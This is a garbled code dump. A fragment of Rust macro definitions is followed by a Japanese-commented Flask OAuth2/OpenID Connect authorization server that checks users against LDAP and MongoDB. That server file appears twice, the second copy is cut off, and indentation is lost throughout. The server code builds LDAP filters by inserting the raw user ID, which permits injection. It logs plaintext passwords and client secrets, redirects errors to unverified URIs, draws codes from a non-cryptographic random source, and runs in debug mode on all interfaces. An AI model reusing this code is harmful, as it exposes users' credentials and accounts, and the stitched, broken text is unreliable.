() => {
$crate::eprint!("\n")
};
($($arg:tt)*) => {{
use std::io::Write as _;
let mut stream = $crate::stderr();
match ::std::writeln!(&mut stream, $($arg)*) {
Err(e) if e.kind() != ::std::io::ErrorKind::BrokenPipe => {
::std::panic!("failed printing to stdout: {e}");
}
Err(_) | Ok(_) => {}
}
}};
}
/// Panics the current thread.
///
/// This allows a program to terminate immediately and provide feedback
/// to the caller of the program.
///
/// This macro is the perfect way to assert conditions in example code and in
/// tests. `panic!` is closely tied with the `unwrap` method of both
/// [`Option`][ounwrap] and [`Result`][runwrap] enums. Both implementations call
/// `panic!` when they are set to [`None`] or [`Err`] variants.
///
/// When using `panic!()` you can specify a string payload, that is built using
/// the [`format!`] syntax. That payload is used when injecting the panic into
/// the calling Rust thread, causing the thread to panic entirely.
///
/// The behavior of the default `std` hook, i.e. the code that runs directly
/// after the panic is invoked, is to print the message payload to
/// `stderr` along with the file/line/column information of the `panic!()`
/// call. You can override the panic hook using [`std::panic::set_hook()`].
/// Inside the hook a panic can be accessed as a `&dyn Any + Send`,
/// which contains either a `&str` or `String` for regular `panic!()` invocations.
/// To panic with a value of another type, [`panic_any`] can be used.
///
/// See also the macro [`compile_error!`], for raising errors during compilation.
///
/// # When to use `panic!` vs `Result`
///
/// The Rust language provides two complementary systems for constructing /
/// representing, reporting, propagating, reacting to, and discarding errors. These
/// responsibilities are collectively known as "error handling." `panic!` and
/// `Result` are similar in that they are each the primary interface of their
/// respective error handling systems; however, the meaning these interfaces attach
/// to their errors and the responsibilities they fulfill within their respective
/// error handling systems differ.
///
/// The `panic!` macro is used to construct errors that represent a bug that has
/// been detected in your program. With `panic!` you provide a message that
/// describes the bug and the language then constructs an error with that message,
/// reports it, and propagates it for you.
///
/// `Result` on the other hand is used to wrap other types that represent either
/// the successful result of some computation, `Ok(T)`, or error types that
/// represent an anticipated runtime failure mode of that computation, `Err(E)`.
/// `Result` is used alongside user defined types which represent the various
/// anticipated runtime failure modes that the associated computation could
/// encounter. `Result` must be propagated manually, often with the help of the
/// `?` operator and `Try` trait, and they must be reported manually, often with
/// the help of the `Error` trait.
///
/// For more detailed information about error handling check out the [book] or the
/// [`std::result`] module docs.
///
/// [ounwrap]: Option::unwrap
/// [runwrap]: Result::unwrap
/// [`std::panic::set_hook()`]: ../std/panic/fn.set_hook.html
/// [`panic_any`]: ../std/panic/fn.panic_any.html
/// [`Box`]: ../std/boxed/struct.Box.html
/// [`Any`]: crate::any::Any
/// [`format!`]: ../std/macro.format.html
/// [book]: ../book/ch09-00-error-handling.html
/// [`std::result`]: ../std/result/index.html
///
/// # Current implementation
///
/// If the main thread panics it will terminate all your threads and end your
/// program with code `101`.
///
/// # Examples
///
/// ```should_panic
/// # #![allow(unreachable_code)]
/// use anstream::panic;
/// panic!();
/// panic!("this is a terrible mistake!");
/// panic!("this is a {} {message}", "fancy", message = "message");
/// ```
#[cfg(feature = "auto")]
#[macro_export]
macro_rules! panic {
() => {
::std::panic!()
};
($($arg:tt)*) => {{
use std::io::Write as _;
let panic_stream = std::io::stderr();
let choice = $crate::AutoStream::choice(&panic_stream);
let buffer = $crate::Buffer::new();
let mut stream = $crate::AutoStream::new(buffer, choice);
// Ignore errors rather than panic
let _ = ::std::write!(&mut stream, $($arg)*);
let buffer = stream.into_inner();
// Should be UTF-8 but not wanting to panic
let buffer = String::from_utf8_lossy(buffer.as_bytes()).into_owned();
::std::panic!("{}", buffer)
}};
}
app.py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
#
# 認証認可サーバー
#
import os
import uuid
import json
import hashlib
import requests
import time
import base64
import auth_config as cf
# Flaskフレームワーク関連
from flask import Flask,render_template,make_response,request,send_from_directory,redirect,send_file
from flask_restful import Resource,Api,reqparse
from flask_httpauth import HTTPBasicAuth
# https://flask-cors.readthedocs.io/en/latest/
from flask_cors import CORS
# OAuth2関連
#import python_jwt as jwt, jwcrypto.jwk as jwk, datetime
from authlib.jose import jwt
# LDAP関連
from ldap3 import Server, Connection, ALL
from pySSHA import ssha
from base64 import b64encode as encode
from base64 import b64decode as decode
# URL操作
import urllib.parse
# アクセストークンDB MongoDB
from pymongo import MongoClient
from datetime import datetime
#MONGO_SERVER = 'mongo'
#MONGO_PORT = 27017
#MONGO_DATABASE = 'oidc_database'
#MONGO_COLLECTION_ACCESS_TOKEN = "access_token"
#MONGO_COLLECTION_CLIENTS = "clients"
#MONGO_COLLECTION_USERINFO = "userinfo"
client = MongoClient(cf.MONGO_SERVER, cf.MONGO_PORT)
db = client[cf.MONGO_DATABASE]
col_atoken = db[cf.MONGO_COLLECTION_ACCESS_TOKEN]
col_clients = db[cf.MONGO_COLLECTION_CLIENTS]
col_userinfo = db[cf.MONGO_COLLECTION_USERINFO]
# LDAP関連
from ldap3 import Server, Connection, ALL
from pySSHA import ssha
from base64 import b64encode as encode
from base64 import b64decode as decode
#LDAP_SERVER='ldap.labo.local'
#LDAP_PORTNO=636
#USE_LDAPS=True
#LDAP_DOMAIN='dc=labo,dc=local'
#LDAP_USER='cn=Manager,dc=labo,dc=local'
#LDAP_PASSWD='secret'
# 認証サーバーのアドレス
#OAUTH_SERVER_URL='http://localhost:5810/'
# Flaskの初期化
# ブラウザのJavaScriptからヘッダー Authorization を読み取れるようにするための設定を加える
# Cross-Origin Resource Sharing (CORS) を設定して、他オリジンからのアクセスを許可する
# 参考 https://flask-cors.readthedocs.io/en/latest/
#
app = Flask(__name__, static_url_path='/public')
app.config['CORS_EXPOSE_HEADERS'] = "*"
CORS(app)
auth = HTTPBasicAuth()
codes = {}
requests = {}  # NOTE: this dict shadows the requests HTTP library imported above
#-------------------------------------
# 関数 ユーザー名から取得
def get_userinfo(user):
return col_userinfo.find_one({'uid': user},{"_id": 0})
# 関数 ランダム文字列生成
import random, string
def get_random_string(n):
return ''.join(random.choices(string.ascii_letters + string.digits, k=n))
# 関数 client_id のチェック
#
def check_client_id(client_id):
return col_clients.find_one({'client_id': client_id},{"_id": 0}) != None
# 関数 リダイレクト先指定のチェック
def check_redirect(client_id,redirect_uri):
doc = col_clients.find_one({'client_id': client_id},{"_id": 0})
if doc == None:
return False
for uri in doc['redirect_uris']:
if uri == redirect_uri:
return True
return False
# 関数 スコープのチェック
def check_scope(client_id,scope):
doc = col_clients.find_one({'client_id': client_id},{"_id": 0})
if doc == None:
return False
cscope = doc['scope'].split(" ")
rscope = scope.split(" ")
for req in rscope:
if req not in cscope:
return False
return True
# 関数 クライアントid とsecret のチェック
def check_client_secret(client_id,client_secret):
query = {"client_id": client_id, "client_secret": client_secret}
return col_clients.find_one(query,{"_id": 0}) != None
# 関数 クライアントIDからパスワードを得る
@auth.get_password
def get_pw(client_id):
doc = col_clients.find_one({'client_id': client_id},{'_id': 0,'client_secret': 1 })
if doc != None:
return doc['client_secret']
else:
return None
# 関数 ログインをLDAPサーバーの応答と比較する
def valid_login(user_id,passwd):
server = Server(cf.LDAP_SERVER, port=cf.LDAP_PORTNO, use_ssl=cf.USE_LDAPS)
conn = Connection(server, cf.LDAP_USER, cf.LDAP_PASSWD, auto_bind=True)
user_filter = '(&(objectclass=inetOrgPerson)(uid=%s))' % (user_id)
conn.search(cf.LDAP_DOMAIN, user_filter, attributes=['uid','userPassword'])
for entry in conn.entries:
data_json = json.loads(entry.entry_to_json())
app.logger.debug("==================")
app.logger.debug(data_json)
app.logger.debug("==================")
ssha_pw = data_json['attributes']['userPassword'][0]
check = ssha.checkPassword( passwd, ssha_pw, suffixed = True, salt_size = 4, debug = 3)
return check
def search_ldap(user_id):
server = Server(cf.LDAP_SERVER, port=cf.LDAP_PORTNO, use_ssl=cf.USE_LDAPS)
conn = Connection(server, cf.LDAP_USER, cf.LDAP_PASSWD, auto_bind=True)
user_filter = '(&(objectclass=inetOrgPerson)(uid=%s))' % (user_id)
conn.search(cf.LDAP_DOMAIN, user_filter, attributes=['uid','sn','cn','ou','userPassword'])
for entry in conn.entries:
data_json = json.loads(entry.entry_to_json())
app.logger.debug("xxxxxxxxxxxxxxxxxx")
app.logger.debug(data_json)
app.logger.debug(data_json['attributes'])
app.logger.debug("xxxxxxxxxxxxxxxxxx")
return data_json['attributes']
#
# JWT生成 アクセストークン
#
def create_access_token(apl_id,user_id):
app.logger.debug("create_access_token ")
header = {
'typ': 'JWT',
'alg': 'RS256',
'kid': 'authserver',
}
payload = {
"iss": "Auth_Server",
"sub": apl_id,
"aud": user_id,
'iat': int(time.time()), # 現在時刻
'exp': int(time.time()) + 3600, # 有効期限時刻 1時間
"scope": "openid profile email address phone read:appointments"
}
with open('key-private.pem', 'rb') as f:
key = f.read()
return jwt.encode(header, payload, key).decode()
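#
# 参考: 発行したアクセストークン(JWT)を検証する例
# A minimal, hedged sketch (not part of the original request flow): a resource
# server could verify the token created above with the public key that the
# /publickey endpoint serves. The helper name verify_access_token and the local
# file name 'key-public.pem' are assumptions for illustration.
def verify_access_token(token):
    # 公開鍵を読み込んで署名を検証し、クレームを取り出す
    with open('key-public.pem', 'rb') as f:
        pubkey = f.read()
    claims = jwt.decode(token, pubkey)
    # exp などの登録クレームを検証する
    claims.validate()
    return claims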
#-------------------------------------
#
# ダミーのトップページを表示
# 認証認可サーバーであることを表示
#
@app.route('/')
def home():
return render_template('index.html', title='plane-test', name="home")
#
# 公開鍵の配布
#
@app.route('/publickey')
def download_file():
path = "/app/key-public.pem"
return send_file(path)
#
# 認証と認可
#
# クライアント(アプリ)からの要求を受けて、
# 認証画面(ログイン)フォームを表示する
#
# 不正アクセス防止のチェックで問題が検知されたら error をつけて
# リダイレクト先へリクエストを送る
#
@app.route('/authorize')
def authorize():
app.logger.debug(request.url)
app.logger.debug(request.method)
qs = urllib.parse.urlparse(request.url)
query = dict(urllib.parse.parse_qsl(qs.query))
app.logger.debug(query)
# reqid を生成して、/authn でチェックする
# フォームの隠しフィールドにreqid をセットして、次でチェックする。
reqid = get_random_string(8)
app.logger.debug("client_id = " + query['client_id'])
#app.logger.debug("client_secret = " + query['client_secret'])
app.logger.debug("redirect_uri = " + query['redirect_uri'])
app.logger.debug("scope = " + query['scope'])
app.logger.debug("state = " + query['state'])
app.logger.debug("response_type = " + query['response_type'])
app.logger.debug("reqid = " + reqid)
# クライアントIDの存在チェック
# クライアントID(アプリID)は、事前に認証サーバーに登録されていないといけない
if check_client_id(query['client_id']) == False:
app.logger.debug('Unknown client = ' + query['client_id'])
resp = { 'error': 'Unknown client' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
# リダイレクトURLのチェック
# リダイレクト先URIも、事前に認証サーバーに登録されていなければならない
if check_redirect(query['client_id'],query['redirect_uri']) == False:
app.logger.debug('Invalid redirect URI = ' + query['client_id'],query['redirect_uri'])
resp = { 'error': 'Invalid redirect URI' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
# 次の処理を照合するためにDBへ保存する
requests[reqid] = qs.query
# 個人を認証(ログイン)フォームを表示
return render_template('authorize.html',
client_id=query['client_id'],
redirect_uri=query['redirect_uri'],
state=query['state'],
reqid=reqid,scope=query['scope'])
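#
# 参考: クライアント側が /authorize を呼び出す際のURL組み立て例
# A hypothetical sketch of the query string a client app would attach when it
# redirects the browser to this endpoint; the client_id and redirect_uri values
# below are made up and would have to match an entry in the clients collection.
#
# params = {
#     'response_type': 'code',
#     'client_id': 'sample-app',
#     'redirect_uri': 'http://localhost:5820/callback',
#     'scope': 'openid profile',
#     'state': get_random_string(16),
# }
# authorize_url = cf.OAUTH_SERVER_URL + 'authorize?' + urllib.parse.urlencode(params)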
#
# 認証(ログイン)フォームからのインプットを受け、
# ユーザーIDとパスワードを照合して、一致していれば、認証は成功とする
#
## Approve
@app.route('/approve', methods=['POST', 'GET'])
def authn():
## 認証の処理を実行
## QSの存在チェック 無ければエラー応答
## QSの内容は?
## 1. client_id
## 2. redirect_uris
## 3. state
##
## レスポンスタイプ code であれば処理
## scope の範囲の逸脱が無いことをチェック
#
# ユーザーの認証もここで実施
#
# user: フォームから取得
# scope: フォームから取得
# client_id: QSから取得
# code, state のQSをつけて、リダイレクト先へ転送する
query_recv = urllib.parse.urlparse(request.url)
query = dict(urllib.parse.parse_qsl(query_recv.query))
# reqidをキーとして送ったQuery String を取り出して
# 辞書からキーreqidの値を削除する
reqid = request.form['reqid']
query_sent = None
squery = {}
if reqid in requests:
query_sent = requests.pop(reqid)
squery = dict(urllib.parse.parse_qsl(query_sent))
else:
# 送信したQuery String のIDが無ければ、不正としてエラーを返す
app.logger.debug('No matching authorization request [' + reqid + ']')
resp = { 'error': 'No matching authorization request' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
app.logger.debug(query_recv)
app.logger.debug("client_id = " + query['client_id'])
app.logger.debug("username = " + request.form['username'])
app.logger.debug("password = " + request.form['password'])
#app.logger.debug("scope = " + request.form['scope'])
#app.logger.debug("scope2 = " + request.form.getlist['scope2'])
app.logger.debug("scope2 ======")
scope2 = request.form.getlist('scope2')
scope = ""
n = 0
for x in scope2:
if n == 0:
scope = x
else:
scope = scope + " " + x
n = n + 1
app.logger.debug("scope = " + scope)
app.logger.debug(scope)
app.logger.debug("redirect_uri = " + query['redirect_uri'])
app.logger.debug("state = " + query['state'])
#############################################################
# 認証 ユーザーID と パスワードのチェック LDAPで照合
#############################################################
if valid_login(request.form['username'],request.form['password']):
app.logger.debug("認証成功")
else:
resp = { 'error': 'id or password failed' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
if 'approve' not in request.form:
resp = { 'error': 'access_denied' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
app.logger.debug("approve = " + request.form['approve'])
# 送信したQSのレスポンスタイプがcodeで無ければエラーを返す
if squery['response_type'] != 'code':
resp = { 'error': 'unsupported_response_type' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
# code へ 8桁のランダムな文字列セット
code = get_random_string(8)
# QSを追加して、リダイレクトするURIを作る
resp_qs = {}
resp_qs['code'] = code # ランダムな文字列を生成してセット
resp_qs['state'] = query['state'] # クライアントから出されたランダム文字列
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp_qs)
app.logger.debug("URL = " + url)
# スコープのチェック
#if not check_scope(query['client_id'], request.form['scope']):
if not check_scope(query['client_id'], scope):
resp = { 'error': 'unsupported_response_type' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
# code をキーにして以下を保存する
codes[code] = {
'request': query_recv,
'scope': scope, #request.form['scope'],
'user': request.form['username'],
'client_id': query['client_id']
};
response = redirect(url, code=302)
return response
#
# 認証の成功を受けて、
# access_token, id_token を発行してアプリへ提供する
#
@app.route('/token', methods=['POST', 'GET'])
@auth.login_required
def token():
app.logger.debug("/token")
app.logger.debug(request.headers)
app.logger.debug(request.form)
clientId = None
clientSecret = None
# authorizationヘッダーから client_id と client_secret を取り出す
if 'authorization' in request.headers:
app.logger.debug("authorization = " + request.headers['authorization'])
app.logger.debug("client_id = " + auth.username())
app.logger.debug("client_secret = " + get_pw(auth.username()))
clientId = auth.username()
clientSecret = get_pw(auth.username())
# client_id がPOSTされていればclient_id と client_secret を取り出す
if 'client_id' in request.form:
# clientId が二つの方法で送られてきたら不審なクライアントと判断
if clientId != None:
app.logger.debug('Client attempted to authenticate with multiple methods')
return {'error': 'invalid_client'}, 401
clientId = request.form['client_id']
clientSecret = request.form['client_secret']
# client_id の存在と一致のチェック
if check_client_id(clientId) == False:
app.logger.debug('Unknown client ' + clientId)
return {'error': 'invalid_client'}, 401
# client_secret パスワードの一致チェック
if check_client_secret(clientId,clientSecret) == False:
app.logger.debug('Mismatched client secret')
return {'error': 'invalid_client'}, 401
app.logger.debug("code = " + request.form['code'])
app.logger.debug("redirect_uri = " + request.form['redirect_uri'])
app.logger.debug("grant_type = " + request.form['grant_type'])
# grant_type のチェック
if request.form['grant_type'] != 'authorization_code':
app.logger.debug('Unknown grant type ' + request.form['grant_type'])
return {'error': 'unsupported_grant_type'}, 400
# リクエストのコードがDBに存在していなければエラー応答
code = request.form['code']
if code not in codes:
app.logger.debug('Unknown code ' + code)
return {'error': 'Unknown code '}, 400
# 自己のDBからcodeを削除して再利用を防止する
code = codes.pop(code)
###
### アクセストークン作成
###
# アクセストークンは 2つの方法がある
# 1 乱数文字を生成、対応する情報をKVSでアプリと共有する
# 2 JWTを作成 アプリでJWTをバリデーションすることで情報を得る
# 以下は
# ランダムな文字列でアクセストークンを生成
# アプリサーバーが、リソースサーバーへアクセスする際に
# HTTPヘッダのAuthorization にaccess_token をセットする。
# つまり、JWTをセットすることも可能であり、ISTIOにも適用できるだろう
#
#access_token = get_random_string(26)
access_token = create_access_token(clientId, get_userinfo(code['user']))
app.logger.debug("access_token = ")
app.logger.debug(access_token)
#>>> claims = jwt.decode(s, read_file('public.pem'))
#>>> print(claims)
#{'iss': 'Authlib', 'sub': '123', ...}
#>>> print(claims.header)
#{'alg': 'RS256', 'typ': 'JWT'}
#>>> claims.validate()
# NoSQLに保存
# access_token はNoSQLに登録しておき、リソースサーバーでNoSQLをアクセスして
# access_token を照合して、不一致であればアクセスを拒否する
access_token_data = {
'access_token': access_token,
'client_id': clientId,
'scope': code['scope'],
'user': get_userinfo(code['user'])
}
col_atoken.insert_one(access_token_data)
###
### IDトークンを作成
###
# スコープをセット
cscope = None
if 'scope' in code:
cscope = code['scope']
app.logger.debug("toke_response")
token_response = {
'access_token': access_token,
'token_type': 'Bearer',
'scope': cscope
}
# スコープにopenid が存在、ユーザーがセットされていたら
work_scope = code['scope'].split(" ")
if ('openid' in work_scope ) and ('user' in code):
header = {
'typ': 'JWT',
'alg': 'RS256',
'kid': 'authserver'
}
#
# LDAPからユーザーの属性をセットする
#
app.logger.debug("mongo user = " + code['user'])
app.logger.debug("mongo client_id = " + code['client_id'])
for c in code:
app.logger.debug(c)
user_info = search_ldap(code['user'])
app.logger.debug("user_info = " + user_info['cn'][0])
#
# OIDCのペイロード
# 参考 https://qiita.com/TakahikoKawasaki/items/8f0e422c7edd2d220e06
# https://openid.net/specs/openid-connect-core-1_0.html#StandardClaims
#
payload = {
'iss': cf.OAUTH_SERVER_URL, # 認証サーバーのURLアドレス
'sub': code['user'], # 一意のユーザーUID
'aud': code['client_id'], # 認可を受けたアプリID
'name': user_info['cn'][0], # ユーザー名
'iat': int(time.time()), # 現在時刻
'exp': int(time.time()) + 300 # 有効期限時刻 5分
}
# リクエストのnonceが入っていれば nonceを追加する
if 'request' in code:
if 'nonce' in code['request']:
payload['nonce'] = code['request']['nonce']
# JWTの生成
with open('key-private.pem', 'rb') as f:
prvkey = f.read()
id_token = jwt.encode(header, payload, prvkey)
app.logger.debug('Issued tokens for code ' + id_token.decode())
app.logger.debug('id_tokenはバイナリからストリング化する')
token_response['id_token'] = id_token.decode()
app.logger.debug('id_tokenはバイナリからストリング化した')
return token_response, 200
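#
# 参考: リソースサーバー側でのアクセストークン照合例
# The comments above note that the resource server looks the issued access token
# up in MongoDB and rejects the request when no document matches. A minimal,
# hypothetical version of that check, reusing this file's col_atoken collection
# (the function name is an assumption, not part of the original code):
def is_token_registered(access_token):
    doc = col_atoken.find_one({'access_token': access_token}, {'_id': 0})
    return doc is not None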
##
## MAIN
##
if __name__ == '__main__':
api = Api(app)
bx_port = os.getenv("PORT")
listen_port = int(bx_port if bx_port else 5000)
app.run(host='0.0.0.0', port=listen_port, debug=True)
app.py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
#
# 認証認可サーバー
#
import os
import uuid
import json
import hashlib
import requests
import time
import base64
import auth_config as cf
# Flaskフレームワーク関連
from flask import Flask,render_template,make_response,request,send_from_directory,redirect,send_file
from flask_restful import Resource,Api,reqparse
from flask_httpauth import HTTPBasicAuth
# https://flask-cors.readthedocs.io/en/latest/
from flask_cors import CORS
# OAuth2関連
#import python_jwt as jwt, jwcrypto.jwk as jwk, datetime
from authlib.jose import jwt
# LDAP関連
from ldap3 import Server, Connection, ALL
from pySSHA import ssha
from base64 import b64encode as encode
from base64 import b64decode as decode
# URL操作
import urllib.parse
# アクセストークンDB MongoDB
from pymongo import MongoClient
from datetime import datetime
#MONGO_SERVER = 'mongo'
#MONGO_PORT = 27017
#MONGO_DATABASE = 'oidc_database'
#MONGO_COLLECTION_ACCESS_TOKEN = "access_token"
#MONGO_COLLECTION_CLIENTS = "clients"
#MONGO_COLLECTION_USERINFO = "userinfo"
client = MongoClient(cf.MONGO_SERVER, cf.MONGO_PORT)
db = client[cf.MONGO_DATABASE]
col_atoken = db[cf.MONGO_COLLECTION_ACCESS_TOKEN]
col_clients = db[cf.MONGO_COLLECTION_CLIENTS]
col_userinfo = db[cf.MONGO_COLLECTION_USERINFO]
# LDAP関連
from ldap3 import Server, Connection, ALL
from pySSHA import ssha
from base64 import b64encode as encode
from base64 import b64decode as decode
#LDAP_SERVER='ldap.labo.local'
#LDAP_PORTNO=636
#USE_LDAPS=True
#LDAP_DOMAIN='dc=labo,dc=local'
#LDAP_USER='cn=Manager,dc=labo,dc=local'
#LDAP_PASSWD='secret'
# 認証サーバーのアドレス
#OAUTH_SERVER_URL='http://localhost:5810/'
# Flaskの初期化
# ブラウザのJavaScriptからヘッダー Authorization を読み取れるようにするための設定を加える
# Cross-Origin Resource Sharing (CORS) を設定して、他オリジンからのアクセスを許可する
# 参考 https://flask-cors.readthedocs.io/en/latest/
#
app = Flask(__name__, static_url_path='/public')
app.config['CORS_EXPOSE_HEADERS'] = "*"
CORS(app)
auth = HTTPBasicAuth()
codes = {}
requests = {}
#-------------------------------------
# 関数 ユーザー名から取得
def get_userinfo(user):
return col_userinfo.find_one({'uid': user},{"_id": 0})
# 関数 ランダム文字列生成
import random, string
def get_random_string(n):
return ''.join(random.choices(string.ascii_letters + string.digits, k=n))
# 関数 client_id のチェック
#
def check_client_id(client_id):
return col_clients.find_one({'client_id': client_id},{"_id": 0}) != None
# 関数 リダイレクト先指定のチェック
def check_redirect(client_id,redirect_uri):
doc = col_clients.find_one({'client_id': client_id},{"_id": 0})
if doc == None:
return False
for uri in doc['redirect_uris']:
if uri == redirect_uri:
return True
return False
# 関数 スコープのチェック
def check_scope(client_id,scope):
doc = col_clients.find_one({'client_id': client_id},{"_id": 0})
if doc == None:
return False
cscope = doc['scope'].split(" ")
rscope = scope.split(" ")
for req in rscope:
if req not in cscope:
return False
return True
# 関数 クライアントid とsecret のチェック
def check_client_secret(client_id,client_secret):
query = {"client_id": client_id, "client_secret": client_secret}
return col_clients.find_one(query,{"_id": 0}) != None
# 関数 クライアントIDからパスワードを得る
@auth.get_password
def get_pw(client_id):
doc = col_clients.find_one({'client_id': client_id},{'_id': 0,'client_secret': 1 })
if doc != None:
return doc['client_secret']
else:
return None
# 関数 ログインをLDAPサーバーの応答と比較する
def valid_login(user_id,passwd):
server = Server(cf.LDAP_SERVER, port=cf.LDAP_PORTNO, use_ssl=cf.USE_LDAPS)
conn = Connection(server, cf.LDAP_USER, cf.LDAP_PASSWD, auto_bind=True)
user_filter = '(&(objectclass=inetOrgPerson)(uid=%s))' % (user_id)
conn.search(cf.LDAP_DOMAIN, user_filter, attributes=['uid','userPassword'])
for entry in conn.entries:
data_json = json.loads(entry.entry_to_json())
app.logger.debug("==================")
app.logger.debug(data_json)
app.logger.debug("==================")
ssha_pw = data_json['attributes']['userPassword'][0]
check = ssha.checkPassword( passwd, ssha_pw, suffixed = True, salt_size = 4, debug = 3)
return check
def search_ldap(user_id):
server = Server(cf.LDAP_SERVER, port=cf.LDAP_PORTNO, use_ssl=cf.USE_LDAPS)
conn = Connection(server, cf.LDAP_USER, cf.LDAP_PASSWD, auto_bind=True)
user_filter = '(&(objectclass=inetOrgPerson)(uid=%s))' % (user_id)
conn.search(cf.LDAP_DOMAIN, user_filter, attributes=['uid','sn','cn','ou','userPassword'])
for entry in conn.entries:
data_json = json.loads(entry.entry_to_json())
app.logger.debug("xxxxxxxxxxxxxxxxxx")
app.logger.debug(data_json)
app.logger.debug(data_json['attributes'])
app.logger.debug("xxxxxxxxxxxxxxxxxx")
return data_json['attributes']
#
# JWT生成 アクセストークン
#
def create_access_token(apl_id,user_id):
app.logger.debug("create_access_token ")
header = {
'typ': 'JWT',
'alg': 'RS256',
'kid': 'authserver',
}
payload = {
"iss": "Auth_Server",
"sub": apl_id,
"aud": user_id,
'iat': int(time.time()), # 現在時刻
'exp': int(time.time()) + 3600, # 有効期限時刻 1時間
"scope": "openid profile email address phone read:appointments"
}
with open('key-private.pem', 'rb') as f:
key = f.read()
return jwt.encode(header, payload, key).decode()
#-------------------------------------
#
# ダミーのトップページを表示
# 認証認可サーバーであることを表示
#
@app.route('/')
def home():
return render_template('index.html', title='plane-test', name="home")
#
# 公開鍵の配布
#
@app.route('/publickey')
def download_file():
path = "/app/key-public.pem"
return send_file(path)
#
# 認証と認可
#
# クライアント(アプリ)からの要求を受けて、
# 認証画面(ログイン)フォームを表示する
#
# 不正アクセス防止のチェックで問題が検知されたら error をつけて
# リダイレクト先へリクエストを送る
#
@app.route('/authorize')
def authorize():
app.logger.debug(request.url)
app.logger.debug(request.method)
qs = urllib.parse.urlparse(request.url)
query = dict(urllib.parse.parse_qsl(qs.query))
app.logger.debug(query)
# reqid を生成して、/authn でチェックする
# フォームの隠しフィールドにreqid をセットして、次でチェックする。
reqid = get_random_string(8)
app.logger.debug("client_id = " + query['client_id'])
#app.logger.debug("client_secret = " + query['client_secret'])
app.logger.debug("redirect_uri = " + query['redirect_uri'])
app.logger.debug("scope = " + query['scope'])
app.logger.debug("state = " + query['state'])
app.logger.debug("response_type = " + query['response_type'])
app.logger.debug("reqid = " + reqid)
# クライアントIDの存在チェック
# クライアントID(アプリID)は、事前に認証サーバーに登録されていないといけない
if check_client_id(query['client_id']) == False:
app.logger.debug('Unknown client = ' + query['client_id'])
resp = { 'error': 'Unknown client' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
# リダイレクトURLのチェック
# リダイレクト先URIも、事前に認証サーバーに登録されていなければならない
if check_redirect(query['client_id'],query['redirect_uri']) == False:
app.logger.debug('Invalid redirect URI = ' + query['client_id'],query['redirect_uri'])
resp = { 'error': 'Invalid redirect URI' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
# 次の処理を照合するためにDBへ保存する
requests[reqid] = qs.query
# 個人を認証(ログイン)フォームを表示
return render_template('authorize.html',
client_id=query['client_id'],
redirect_uri=query['redirect_uri'],
state=query['state'],
reqid=reqid,scope=query['scope'])
#
# 認証(ログイン)フォームからのインプットを受け、
# ユーザーIDとパスワードを照合して、一致していれば、認証は成功とする
#
## Approve
@app.route('/approve', methods=['POST', 'GET'])
def authn():
## 認証の処理を実行
## QSの存在チェック 無ければエラー応答
## QSの内容は?
## 1. client_id
## 2. redirect_uris
## 3. state
##
## レスポンスタイプ code であれば処理
## scope の範囲の逸脱が無いことをチェック
#
# ユーザーの認証もここで実施
#
# user: フォームから取得
# scope: フォームから取得
# client_id: QSから取得
# code, state のQSをつけて、リダイレクト先へ転送する
query_recv = urllib.parse.urlparse(request.url)
query = dict(urllib.parse.parse_qsl(query_recv.query))
# reqidをキーとして送ったQuery String を取り出して
# 辞書からキーreqidの値を削除する
reqid = request.form['reqid']
query_sent = None
squery = {}
if reqid in requests:
query_sent = requests.pop(reqid)
squery = dict(urllib.parse.parse_qsl(query_sent))
else:
# 送信したQuery String のIDが無ければ、不正としてエラーを返す
app.logger.debug('No matching authorization request [' + reqid + ']')
resp = { 'error': 'No matching authorization request' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
app.logger.debug(query_recv)
app.logger.debug("client_id = " + query['client_id'])
app.logger.debug("username = " + request.form['username'])
app.logger.debug("password = " + request.form['password'])
#app.logger.debug("scope = " + request.form['scope'])
#app.logger.debug("scope2 = " + request.form.getlist['scope2'])
app.logger.debug("scope2 ======")
scope2 = request.form.getlist('scope2')
scope = ""
n = 0
for x in scope2:
if n == 0:
scope = x
else:
scope = scope + " " + x
n = n + 1
app.logger.debug("scope = " + scope)
app.logger.debug(scope)
app.logger.debug("redirect_uri = " + query['redirect_uri'])
app.logger.debug("state = " + query['state'])
#############################################################
# 認証 ユーザーID と パスワードのチェック LDAPで照合
#############################################################
if valid_login(request.form['username'],request.form['password']):
app.logger.debug("認証成功")
else:
resp = { 'error': 'id or password failed' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
if 'approve' not in request.form:
resp = { 'error': 'access_denied' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
app.logger.debug("approve = " + request.form['approve'])
# 送信したQSのレスポンスタイプがcodeで無ければエラーを返す
if squery['response_type'] != 'code':
resp = { 'error': 'unsupported_response_type' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
# code へ 8桁のランダムな文字列セット
code = get_random_string(8)
# QSを追加して、リダイレクトするURIを作る
resp_qs = {}
resp_qs['code'] = code # ランダムな文字列を生成してセット
resp_qs['state'] = query['state'] # クライアントから出されたランダム文字列
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp_qs)
app.logger.debug("URL = " + url)
# スコープのチェック
#if not check_scope(query['client_id'], request.form['scope']):
if not check_scope(query['client_id'], scope):
resp = { 'error': 'unsupported_response_type' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
# code をキーにして以下を保存する
codes[code] = {
